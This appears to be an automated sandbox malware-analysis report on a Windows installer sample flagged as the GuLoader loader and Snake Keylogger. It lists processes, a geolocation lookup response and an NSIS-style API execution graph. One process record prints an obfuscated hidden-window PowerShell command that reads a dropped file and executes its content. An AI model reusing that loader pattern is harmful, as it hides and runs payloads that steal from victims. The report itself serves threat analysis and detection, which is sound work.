                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1979&rtt_var=757&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1430671&cwnd=234&unsent_bytes=0&cid=2aeb09e5d6b4b9ab&ts=139&x=0"
                                                                  2025-01-10 15:02:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:10:01:00
                                                                  Start date:10/01/2025
                                                                  Path:C:\Users\user\Desktop\ln5S7fIBkY.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\ln5S7fIBkY.exe"
                                                                  Imagebase:0x400000
                                                                  File size:678'408 bytes
                                                                  MD5 hash:E38257F3EAA78E2DCA3C3063B05EAA70
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:10:01:01
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)"
                                                                  Imagebase:0x370000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2353301520.000000000C110000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:10:01:01
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff70f010000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:10:02:22
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\syswow64\msiexec.exe"
                                                                  Imagebase:0x750000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2772117735.00000000247B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:24.4%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:20.5%
                                                                    Total number of Nodes:1338
                                                                    Total number of Limit Nodes:35
                                                                    execution_graph 3007 401941 3008 401943 3007->3008 3013 402c41 3008->3013 3014 402c4d 3013->3014 3059 4062b9 3014->3059 3017 401948 3019 4059a9 3017->3019 3101 405c74 3019->3101 3022 4059d1 DeleteFileW 3024 401951 3022->3024 3023 4059e8 3025 405b13 3023->3025 3115 406297 lstrcpynW 3023->3115 3025->3024 3144 4065da FindFirstFileW 3025->3144 3027 405a0e 3028 405a21 3027->3028 3029 405a14 lstrcatW 3027->3029 3116 405bb8 lstrlenW 3028->3116 3030 405a27 3029->3030 3033 405a37 lstrcatW 3030->3033 3034 405a2d 3030->3034 3036 405a42 lstrlenW FindFirstFileW 3033->3036 3034->3033 3034->3036 3038 405b08 3036->3038 3057 405a64 3036->3057 3037 405b31 3147 405b6c lstrlenW CharPrevW 3037->3147 3038->3025 3041 405961 5 API calls 3044 405b43 3041->3044 3043 405aeb FindNextFileW 3045 405b01 FindClose 3043->3045 3043->3057 3046 405b47 3044->3046 3047 405b5d 3044->3047 3045->3038 3046->3024 3050 4052ff 24 API calls 3046->3050 3049 4052ff 24 API calls 3047->3049 3049->3024 3052 405b54 3050->3052 3051 4059a9 60 API calls 3051->3057 3054 40605d 36 API calls 3052->3054 3053 4052ff 24 API calls 3053->3043 3055 405b5b 3054->3055 3055->3024 3057->3043 3057->3051 3057->3053 3120 406297 lstrcpynW 3057->3120 3121 405961 3057->3121 3129 4052ff 3057->3129 3140 40605d MoveFileExW 3057->3140 3063 4062c6 3059->3063 3060 406511 3061 402c6e 3060->3061 3092 406297 lstrcpynW 3060->3092 3061->3017 3076 40652b 3061->3076 3063->3060 3064 4064df lstrlenW 3063->3064 3065 4062b9 10 API calls 3063->3065 3068 4063f4 GetSystemDirectoryW 3063->3068 3070 406407 GetWindowsDirectoryW 3063->3070 3071 40652b 5 API calls 3063->3071 3072 406482 lstrcatW 3063->3072 3073 40643b SHGetSpecialFolderLocation 3063->3073 3074 4062b9 10 API calls 3063->3074 3085 406165 3063->3085 3090 4061de wsprintfW 3063->3090 3091 406297 lstrcpynW 3063->3091 3064->3063 3065->3064 3068->3063 3070->3063 3071->3063 3072->3063 3073->3063 3075 406453 SHGetPathFromIDListW CoTaskMemFree 3073->3075 3074->3063 3075->3063 3083 406538 3076->3083 3077 4065ae 3078 4065b3 CharPrevW 3077->3078 3080 4065d4 3077->3080 3078->3077 3079 4065a1 CharNextW 3079->3077 3079->3083 3080->3017 3082 40658d CharNextW 3082->3083 3083->3077 3083->3079 3083->3082 3084 40659c CharNextW 3083->3084 3097 405b99 3083->3097 3084->3079 3093 406104 3085->3093 3088 4061c9 3088->3063 3089 406199 RegQueryValueExW RegCloseKey 3089->3088 3090->3063 3091->3063 3092->3061 3094 406113 3093->3094 3095 406117 3094->3095 3096 40611c RegOpenKeyExW 3094->3096 3095->3088 3095->3089 3096->3095 3099 405b9f 3097->3099 3098 405bb5 3098->3083 3099->3098 3100 405ba6 CharNextW 3099->3100 3100->3099 3150 406297 lstrcpynW 3101->3150 3103 405c85 3151 405c17 CharNextW CharNextW 3103->3151 3106 4059c9 3106->3022 3106->3023 3107 40652b 5 API calls 3113 405c9b 3107->3113 3108 405ccc lstrlenW 3109 405cd7 3108->3109 3108->3113 3110 405b6c 3 API calls 3109->3110 3112 405cdc GetFileAttributesW 3110->3112 3111 4065da 2 API calls 3111->3113 3112->3106 3113->3106 3113->3108 3113->3111 3114 405bb8 2 API calls 3113->3114 3114->3108 3115->3027 3117 405bc6 3116->3117 3118 405bd8 3117->3118 3119 405bcc CharPrevW 3117->3119 3118->3030 3119->3117 3119->3118 3120->3057 3157 405d68 GetFileAttributesW 3121->3157 3124 40598e 3124->3057 3125 405984 DeleteFileW 3127 40598a 3125->3127 3126 40597c RemoveDirectoryW 3126->3127 3127->3124 3128 40599a SetFileAttributesW 3127->3128 3128->3124 3130 40531a 3129->3130 3131 4053bc 3129->3131 3132 405336 lstrlenW 3130->3132 3133 4062b9 17 API calls 3130->3133 3131->3057 3134 405344 lstrlenW 3132->3134 3135 40535f 3132->3135 3133->3132 3134->3131 3136 405356 lstrcatW 3134->3136 3137 405372 3135->3137 3138 405365 SetWindowTextW 3135->3138 3136->3135 3137->3131 3139 405378 SendMessageW SendMessageW SendMessageW 3137->3139 3138->3137 3139->3131 3141 40607e 3140->3141 3142 406071 3140->3142 3141->3057 3160 405ee3 3142->3160 3145 4065f0 FindClose 3144->3145 3146 405b2d 3144->3146 3145->3146 3146->3024 3146->3037 3148 405b37 3147->3148 3149 405b88 lstrcatW 3147->3149 3148->3041 3149->3148 3150->3103 3152 405c34 3151->3152 3155 405c46 3151->3155 3154 405c41 CharNextW 3152->3154 3152->3155 3153 405c6a 3153->3106 3153->3107 3154->3153 3155->3153 3156 405b99 CharNextW 3155->3156 3156->3155 3158 40596d 3157->3158 3159 405d7a SetFileAttributesW 3157->3159 3158->3124 3158->3125 3158->3126 3159->3158 3161 405f13 3160->3161 3162 405f39 GetShortPathNameW 3160->3162 3187 405d8d GetFileAttributesW CreateFileW 3161->3187 3164 406058 3162->3164 3165 405f4e 3162->3165 3164->3141 3165->3164 3167 405f56 wsprintfA 3165->3167 3166 405f1d CloseHandle GetShortPathNameW 3166->3164 3169 405f31 3166->3169 3168 4062b9 17 API calls 3167->3168 3170 405f7e 3168->3170 3169->3162 3169->3164 3188 405d8d GetFileAttributesW CreateFileW 3170->3188 3172 405f8b 3172->3164 3173 405f9a GetFileSize GlobalAlloc 3172->3173 3174 406051 CloseHandle 3173->3174 3175 405fbc 3173->3175 3174->3164 3189 405e10 ReadFile 3175->3189 3180 405fdb lstrcpyA 3183 405ffd 3180->3183 3181 405fef 3182 405cf2 4 API calls 3181->3182 3182->3183 3184 406034 SetFilePointer 3183->3184 3196 405e3f WriteFile 3184->3196 3187->3166 3188->3172 3190 405e2e 3189->3190 3190->3174 3191 405cf2 lstrlenA 3190->3191 3192 405d33 lstrlenA 3191->3192 3193 405d3b 3192->3193 3194 405d0c lstrcmpiA 3192->3194 3193->3180 3193->3181 3194->3193 3195 405d2a CharNextA 3194->3195 3195->3192 3197 405e5d GlobalFree 3196->3197 3197->3174 3198 4015c1 3199 402c41 17 API calls 3198->3199 3200 4015c8 3199->3200 3201 405c17 4 API calls 3200->3201 3211 4015d1 3201->3211 3202 401631 3204 401663 3202->3204 3205 401636 3202->3205 3203 405b99 CharNextW 3203->3211 3207 401423 24 API calls 3204->3207 3225 401423 3205->3225 3215 40165b 3207->3215 3211->3202 3211->3203 3214 401617 GetFileAttributesW 3211->3214 3217 405868 3211->3217 3220 4057ce CreateDirectoryW 3211->3220 3229 40584b CreateDirectoryW 3211->3229 3213 40164a SetCurrentDirectoryW 3213->3215 3214->3211 3232 406671 GetModuleHandleA 3217->3232 3221 40581b 3220->3221 3222 40581f GetLastError 3220->3222 3221->3211 3222->3221 3223 40582e SetFileSecurityW 3222->3223 3223->3221 3224 405844 GetLastError 3223->3224 3224->3221 3226 4052ff 24 API calls 3225->3226 3227 401431 3226->3227 3228 406297 lstrcpynW 3227->3228 3228->3213 3230 40585b 3229->3230 3231 40585f GetLastError 3229->3231 3230->3211 3231->3230 3233 406697 GetProcAddress 3232->3233 3234 40668d 3232->3234 3236 40586f 3233->3236 3238 406601 GetSystemDirectoryW 3234->3238 3236->3211 3237 406693 3237->3233 3237->3236 3239 406623 wsprintfW LoadLibraryExW 3238->3239 3239->3237 3892 404344 lstrcpynW lstrlenW 3893 403945 3894 403950 3893->3894 3895 403957 GlobalAlloc 3894->3895 3896 403954 3894->3896 3895->3896 3897 401e49 3898 402c1f 17 API calls 3897->3898 3899 401e4f 3898->3899 3900 402c1f 17 API calls 3899->3900 3901 401e5b 3900->3901 3902 401e72 EnableWindow 3901->3902 3903 401e67 ShowWindow 3901->3903 3904 402ac5 3902->3904 3903->3904 3905 40264a 3906 402c1f 17 API calls 3905->3906 3914 402659 3906->3914 3907 402796 3908 4026a3 ReadFile 3908->3907 3908->3914 3909 405e10 ReadFile 3909->3914 3910 4026e3 MultiByteToWideChar 3910->3914 3911 402798 3927 4061de wsprintfW 3911->3927 3914->3907 3914->3908 3914->3909 3914->3910 3914->3911 3915 402709 SetFilePointer MultiByteToWideChar 3914->3915 3916 4027a9 3914->3916 3918 405e6e SetFilePointer 3914->3918 3915->3914 3916->3907 3917 4027ca SetFilePointer 3916->3917 3917->3907 3919 405e8a 3918->3919 3926 405ea2 3918->3926 3920 405e10 ReadFile 3919->3920 3921 405e96 3920->3921 3922 405ed3 SetFilePointer 3921->3922 3923 405eab SetFilePointer 3921->3923 3921->3926 3922->3926 3923->3922 3924 405eb6 3923->3924 3925 405e3f WriteFile 3924->3925 3925->3926 3926->3914 3927->3907 3931 4016cc 3932 402c41 17 API calls 3931->3932 3933 4016d2 GetFullPathNameW 3932->3933 3934 4016ec 3933->3934 3940 40170e 3933->3940 3936 4065da 2 API calls 3934->3936 3934->3940 3935 401723 GetShortPathNameW 3937 402ac5 3935->3937 3938 4016fe 3936->3938 3938->3940 3941 406297 lstrcpynW 3938->3941 3940->3935 3940->3937 3941->3940 3942 4043cd 3943 4044ff 3942->3943 3946 4043e5 3942->3946 3944 404569 3943->3944 3947 404633 3943->3947 3952 40453a GetDlgItem SendMessageW 3943->3952 3945 404573 GetDlgItem 3944->3945 3944->3947 3948 4045f4 3945->3948 3949 40458d 3945->3949 3950 40420e 18 API calls 3946->3950 3951 404275 8 API calls 3947->3951 3948->3947 3957 404606 3948->3957 3949->3948 3956 4045b3 SendMessageW LoadCursorW SetCursor 3949->3956 3953 40444c 3950->3953 3955 40462e 3951->3955 3975 404230 KiUserCallbackDispatcher 3952->3975 3954 40420e 18 API calls 3953->3954 3959 404459 CheckDlgButton 3954->3959 3979 40467c 3956->3979 3961 40461c 3957->3961 3962 40460c SendMessageW 3957->3962 3973 404230 KiUserCallbackDispatcher 3959->3973 3961->3955 3966 404622 SendMessageW 3961->3966 3962->3961 3963 404564 3976 404658 3963->3976 3966->3955 3968 404477 GetDlgItem 3974 404243 SendMessageW 3968->3974 3970 40448d SendMessageW 3971 4044b3 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3970->3971 3972 4044aa GetSysColor 3970->3972 3971->3955 3972->3971 3973->3968 3974->3970 3975->3963 3977 404666 3976->3977 3978 40466b SendMessageW 3976->3978 3977->3978 3978->3944 3982 4058c3 ShellExecuteExW 3979->3982 3981 4045e2 LoadCursorW SetCursor 3981->3948 3982->3981 3983 40234e 3984 402c41 17 API calls 3983->3984 3985 40235d 3984->3985 3986 402c41 17 API calls 3985->3986 3987 402366 3986->3987 3988 402c41 17 API calls 3987->3988 3989 402370 GetPrivateProfileStringW 3988->3989 3990 401b53 3991 402c41 17 API calls 3990->3991 3992 401b5a 3991->3992 3993 402c1f 17 API calls 3992->3993 3994 401b63 wsprintfW 3993->3994 3995 402ac5 3994->3995 3996 404a55 3997 404a81 3996->3997 3998 404a65 3996->3998 4000 404ab4 3997->4000 4001 404a87 SHGetPathFromIDListW 3997->4001 4007 4058e1 GetDlgItemTextW 3998->4007 4003 404a9e SendMessageW 4001->4003 4004 404a97 4001->4004 4002 404a72 SendMessageW 4002->3997 4003->4000 4006 40140b 2 API calls 4004->4006 4006->4003 4007->4002 4008 401956 4009 402c41 17 API calls 4008->4009 4010 40195d lstrlenW 4009->4010 4011 402592 4010->4011 4012 4014d7 4013 402c1f 17 API calls 4012->4013 4014 4014dd Sleep 4013->4014 4016 402ac5 4014->4016 4017 401f58 4018 402c41 17 API calls 4017->4018 4019 401f5f 4018->4019 4020 4065da 2 API calls 4019->4020 4021 401f65 4020->4021 4023 401f76 4021->4023 4024 4061de wsprintfW 4021->4024 4024->4023 3822 402259 3823 402c41 17 API calls 3822->3823 3824 40225f 3823->3824 3825 402c41 17 API calls 3824->3825 3826 402268 3825->3826 3827 402c41 17 API calls 3826->3827 3828 402271 3827->3828 3829 4065da 2 API calls 3828->3829 3830 40227a 3829->3830 3831 40228b lstrlenW lstrlenW 3830->3831 3835 40227e 3830->3835 3833 4052ff 24 API calls 3831->3833 3832 4052ff 24 API calls 3836 402286 3832->3836 3834 4022c9 SHFileOperationW 3833->3834 3834->3835 3834->3836 3835->3832 3835->3836 3837 40175c 3838 402c41 17 API calls 3837->3838 3839 401763 3838->3839 3840 405dbc 2 API calls 3839->3840 3841 40176a 3840->3841 3842 405dbc 2 API calls 3841->3842 3842->3841 4025 401d5d GetDlgItem GetClientRect 4026 402c41 17 API calls 4025->4026 4027 401d8f LoadImageW SendMessageW 4026->4027 4028 401dad DeleteObject 4027->4028 4029 402ac5 4027->4029 4028->4029 4030 4022dd 4031 4022e4 4030->4031 4034 4022f7 4030->4034 4032 4062b9 17 API calls 4031->4032 4033 4022f1 4032->4033 4035 4058fd MessageBoxIndirectW 4033->4035 4035->4034 4036 401563 4037 402a6b 4036->4037 4040 4061de wsprintfW 4037->4040 4039 402a70 4040->4039 3245 4023e4 3246 402c41 17 API calls 3245->3246 3247 4023f6 3246->3247 3248 402c41 17 API calls 3247->3248 3249 402400 3248->3249 3262 402cd1 3249->3262 3252 402ac5 3253 402438 3254 402444 3253->3254 3286 402c1f 3253->3286 3257 402463 RegSetValueExW 3254->3257 3266 403116 3254->3266 3255 402c41 17 API calls 3258 40242e lstrlenW 3255->3258 3260 402479 RegCloseKey 3257->3260 3258->3253 3260->3252 3263 402cec 3262->3263 3289 406132 3263->3289 3267 40312f 3266->3267 3268 40315d 3267->3268 3296 403324 SetFilePointer 3267->3296 3293 40330e 3268->3293 3272 4032a7 3274 4032e9 3272->3274 3279 4032ab 3272->3279 3273 40317a GetTickCount 3275 403291 3273->3275 3282 4031a6 3273->3282 3276 40330e ReadFile 3274->3276 3275->3257 3276->3275 3277 40330e ReadFile 3277->3282 3278 40330e ReadFile 3278->3279 3279->3275 3279->3278 3280 405e3f WriteFile 3279->3280 3280->3279 3281 4031fc GetTickCount 3281->3282 3282->3275 3282->3277 3282->3281 3283 403221 MulDiv wsprintfW 3282->3283 3285 405e3f WriteFile 3282->3285 3284 4052ff 24 API calls 3283->3284 3284->3282 3285->3282 3287 4062b9 17 API calls 3286->3287 3288 402c34 3287->3288 3288->3254 3290 406141 3289->3290 3291 402410 3290->3291 3292 40614c RegCreateKeyExW 3290->3292 3291->3252 3291->3253 3291->3255 3292->3291 3294 405e10 ReadFile 3293->3294 3295 403168 3294->3295 3295->3272 3295->3273 3295->3275 3296->3268 3342 402868 3343 402c41 17 API calls 3342->3343 3344 40286f FindFirstFileW 3343->3344 3345 402897 3344->3345 3349 402882 3344->3349 3350 4061de wsprintfW 3345->3350 3347 4028a0 3351 406297 lstrcpynW 3347->3351 3350->3347 3351->3349 4041 401968 4042 402c1f 17 API calls 4041->4042 4043 40196f 4042->4043 4044 402c1f 17 API calls 4043->4044 4045 40197c 4044->4045 4046 402c41 17 API calls 4045->4046 4047 401993 lstrlenW 4046->4047 4049 4019a4 4047->4049 4048 4019e5 4049->4048 4053 406297 lstrcpynW 4049->4053 4051 4019d5 4051->4048 4052 4019da lstrlenW 4051->4052 4052->4048 4053->4051 4054 40166a 4055 402c41 17 API calls 4054->4055 4056 401670 4055->4056 4057 4065da 2 API calls 4056->4057 4058 401676 4057->4058 3352 40336c SetErrorMode GetVersion 3353 4033ab 3352->3353 3354 4033b1 3352->3354 3355 406671 5 API calls 3353->3355 3356 406601 3 API calls 3354->3356 3355->3354 3357 4033c7 lstrlenA 3356->3357 3357->3354 3358 4033d7 3357->3358 3359 406671 5 API calls 3358->3359 3360 4033de 3359->3360 3361 406671 5 API calls 3360->3361 3362 4033e5 3361->3362 3363 406671 5 API calls 3362->3363 3364 4033f1 #17 OleInitialize SHGetFileInfoW 3363->3364 3442 406297 lstrcpynW 3364->3442 3367 40343d GetCommandLineW 3443 406297 lstrcpynW 3367->3443 3369 40344f 3370 405b99 CharNextW 3369->3370 3371 403474 CharNextW 3370->3371 3372 40359e GetTempPathW 3371->3372 3382 40348d 3371->3382 3444 40333b 3372->3444 3374 4035b6 3375 403610 DeleteFileW 3374->3375 3376 4035ba GetWindowsDirectoryW lstrcatW 3374->3376 3454 402edd GetTickCount GetModuleFileNameW 3375->3454 3378 40333b 12 API calls 3376->3378 3381 4035d6 3378->3381 3379 405b99 CharNextW 3379->3382 3380 403624 3388 405b99 CharNextW 3380->3388 3424 4036c7 3380->3424 3437 4036d7 3380->3437 3381->3375 3383 4035da GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3381->3383 3382->3379 3384 403587 3382->3384 3386 403589 3382->3386 3387 40333b 12 API calls 3383->3387 3384->3372 3538 406297 lstrcpynW 3386->3538 3392 403608 3387->3392 3395 403643 3388->3395 3392->3375 3392->3437 3393 403811 3397 403895 ExitProcess 3393->3397 3398 403819 GetCurrentProcess OpenProcessToken 3393->3398 3394 4036f1 3548 4058fd 3394->3548 3402 4036a1 3395->3402 3403 403707 3395->3403 3399 403831 LookupPrivilegeValueW AdjustTokenPrivileges 3398->3399 3400 403865 3398->3400 3399->3400 3405 406671 5 API calls 3400->3405 3406 405c74 18 API calls 3402->3406 3407 405868 5 API calls 3403->3407 3408 40386c 3405->3408 3409 4036ad 3406->3409 3410 40370c lstrcatW 3407->3410 3413 403881 ExitWindowsEx 3408->3413 3416 40388e 3408->3416 3409->3437 3539 406297 lstrcpynW 3409->3539 3411 403728 lstrcatW lstrcmpiW 3410->3411 3412 40371d lstrcatW 3410->3412 3415 403744 3411->3415 3411->3437 3412->3411 3413->3397 3413->3416 3418 403750 3415->3418 3419 403749 3415->3419 3554 40140b 3416->3554 3417 4036bc 3540 406297 lstrcpynW 3417->3540 3423 40584b 2 API calls 3418->3423 3422 4057ce 4 API calls 3419->3422 3425 40374e 3422->3425 3426 403755 SetCurrentDirectoryW 3423->3426 3482 403987 3424->3482 3425->3426 3427 403770 3426->3427 3428 403765 3426->3428 3553 406297 lstrcpynW 3427->3553 3552 406297 lstrcpynW 3428->3552 3431 4062b9 17 API calls 3432 4037af DeleteFileW 3431->3432 3433 4037bc CopyFileW 3432->3433 3439 40377e 3432->3439 3433->3439 3434 403805 3436 40605d 36 API calls 3434->3436 3435 40605d 36 API calls 3435->3439 3436->3437 3541 4038ad 3437->3541 3438 4062b9 17 API calls 3438->3439 3439->3431 3439->3434 3439->3435 3439->3438 3440 405880 2 API calls 3439->3440 3441 4037f0 CloseHandle 3439->3441 3440->3439 3441->3439 3442->3367 3443->3369 3445 40652b 5 API calls 3444->3445 3447 403347 3445->3447 3446 403351 3446->3374 3447->3446 3448 405b6c 3 API calls 3447->3448 3449 403359 3448->3449 3450 40584b 2 API calls 3449->3450 3451 40335f 3450->3451 3557 405dbc 3451->3557 3561 405d8d GetFileAttributesW CreateFileW 3454->3561 3456 402f1d 3475 402f2d 3456->3475 3562 406297 lstrcpynW 3456->3562 3458 402f43 3459 405bb8 2 API calls 3458->3459 3460 402f49 3459->3460 3563 406297 lstrcpynW 3460->3563 3462 402f54 GetFileSize 3463 403050 3462->3463 3481 402f6b 3462->3481 3564 402e79 3463->3564 3465 403059 3467 403089 GlobalAlloc 3465->3467 3465->3475 3576 403324 SetFilePointer 3465->3576 3466 40330e ReadFile 3466->3481 3575 403324 SetFilePointer 3467->3575 3470 4030bc 3472 402e79 6 API calls 3470->3472 3471 4030a4 3474 403116 31 API calls 3471->3474 3472->3475 3473 403072 3476 40330e ReadFile 3473->3476 3479 4030b0 3474->3479 3475->3380 3478 40307d 3476->3478 3477 402e79 6 API calls 3477->3481 3478->3467 3478->3475 3479->3475 3479->3479 3480 4030ed SetFilePointer 3479->3480 3480->3475 3481->3463 3481->3466 3481->3470 3481->3475 3481->3477 3483 406671 5 API calls 3482->3483 3484 40399b 3483->3484 3485 4039a1 3484->3485 3486 4039b3 3484->3486 3592 4061de wsprintfW 3485->3592 3487 406165 3 API calls 3486->3487 3488 4039e3 3487->3488 3490 403a02 lstrcatW 3488->3490 3492 406165 3 API calls 3488->3492 3491 4039b1 3490->3491 3577 403c5d 3491->3577 3492->3490 3495 405c74 18 API calls 3496 403a34 3495->3496 3497 403ac8 3496->3497 3499 406165 3 API calls 3496->3499 3498 405c74 18 API calls 3497->3498 3500 403ace 3498->3500 3501 403a66 3499->3501 3502 403ade LoadImageW 3500->3502 3503 4062b9 17 API calls 3500->3503 3501->3497 3506 403a87 lstrlenW 3501->3506 3510 405b99 CharNextW 3501->3510 3504 403b84 3502->3504 3505 403b05 RegisterClassW 3502->3505 3503->3502 3509 40140b 2 API calls 3504->3509 3507 403b8e 3505->3507 3508 403b3b SystemParametersInfoW CreateWindowExW 3505->3508 3511 403a95 lstrcmpiW 3506->3511 3512 403abb 3506->3512 3507->3437 3508->3504 3513 403b8a 3509->3513 3515 403a84 3510->3515 3511->3512 3516 403aa5 GetFileAttributesW 3511->3516 3514 405b6c 3 API calls 3512->3514 3513->3507 3517 403c5d 18 API calls 3513->3517 3518 403ac1 3514->3518 3515->3506 3519 403ab1 3516->3519 3520 403b9b 3517->3520 3593 406297 lstrcpynW 3518->3593 3519->3512 3522 405bb8 2 API calls 3519->3522 3523 403ba7 ShowWindow 3520->3523 3524 403c2a 3520->3524 3522->3512 3525 406601 3 API calls 3523->3525 3585 4053d2 OleInitialize 3524->3585 3528 403bbf 3525->3528 3527 403c30 3529 403c34 3527->3529 3530 403c4c 3527->3530 3531 403bcd GetClassInfoW 3528->3531 3533 406601 3 API calls 3528->3533 3529->3507 3536 40140b 2 API calls 3529->3536 3532 40140b 2 API calls 3530->3532 3534 403be1 GetClassInfoW RegisterClassW 3531->3534 3535 403bf7 DialogBoxParamW 3531->3535 3532->3507 3533->3531 3534->3535 3537 40140b 2 API calls 3535->3537 3536->3507 3537->3507 3538->3384 3539->3417 3540->3424 3542 4038c5 3541->3542 3543 4038b7 CloseHandle 3541->3543 3605 4038f2 3542->3605 3543->3542 3546 4059a9 67 API calls 3547 4036e0 OleUninitialize 3546->3547 3547->3393 3547->3394 3549 405912 3548->3549 3550 4036ff ExitProcess 3549->3550 3551 405926 MessageBoxIndirectW 3549->3551 3551->3550 3552->3427 3553->3439 3555 401389 2 API calls 3554->3555 3556 401420 3555->3556 3556->3397 3558 405dc9 GetTickCount GetTempFileNameW 3557->3558 3559 40336a 3558->3559 3560 405dff 3558->3560 3559->3374 3560->3558 3560->3559 3561->3456 3562->3458 3563->3462 3565 402e82 3564->3565 3566 402e9a 3564->3566 3567 402e92 3565->3567 3568 402e8b DestroyWindow 3565->3568 3569 402ea2 3566->3569 3570 402eaa GetTickCount 3566->3570 3567->3465 3568->3567 3571 4066ad 2 API calls 3569->3571 3572 402eb8 CreateDialogParamW ShowWindow 3570->3572 3573 402edb 3570->3573 3574 402ea8 3571->3574 3572->3573 3573->3465 3574->3465 3575->3471 3576->3473 3578 403c71 3577->3578 3594 4061de wsprintfW 3578->3594 3580 403ce2 3595 403d16 3580->3595 3582 403a12 3582->3495 3583 403ce7 3583->3582 3584 4062b9 17 API calls 3583->3584 3584->3583 3598 40425a 3585->3598 3587 4053f5 3591 40541c 3587->3591 3601 401389 3587->3601 3588 40425a SendMessageW 3589 40542e CoUninitialize 3588->3589 3589->3527 3591->3588 3592->3491 3593->3497 3594->3580 3596 4062b9 17 API calls 3595->3596 3597 403d24 SetWindowTextW 3596->3597 3597->3583 3599 404272 3598->3599 3600 404263 SendMessageW 3598->3600 3599->3587 3600->3599 3603 401390 3601->3603 3602 4013fe 3602->3587 3603->3602 3604 4013cb MulDiv SendMessageW 3603->3604 3604->3603 3606 403900 3605->3606 3607 4038ca 3606->3607 3608 403905 FreeLibrary GlobalFree 3606->3608 3607->3546 3608->3607 3608->3608 3648 40176f 3649 402c41 17 API calls 3648->3649 3650 401776 3649->3650 3651 401796 3650->3651 3652 40179e 3650->3652 3687 406297 lstrcpynW 3651->3687 3688 406297 lstrcpynW 3652->3688 3655 40179c 3658 40652b 5 API calls 3655->3658 3656 4017a9 3657 405b6c 3 API calls 3656->3657 3659 4017af lstrcatW 3657->3659 3675 4017bb 3658->3675 3659->3655 3660 4065da 2 API calls 3660->3675 3661 405d68 2 API calls 3661->3675 3663 4017cd CompareFileTime 3663->3675 3664 40188d 3665 4052ff 24 API calls 3664->3665 3666 401897 3665->3666 3669 403116 31 API calls 3666->3669 3667 4052ff 24 API calls 3670 401879 3667->3670 3668 406297 lstrcpynW 3668->3675 3671 4018aa 3669->3671 3672 4018be SetFileTime 3671->3672 3674 4018d0 CloseHandle 3671->3674 3672->3674 3673 4062b9 17 API calls 3673->3675 3674->3670 3676 4018e1 3674->3676 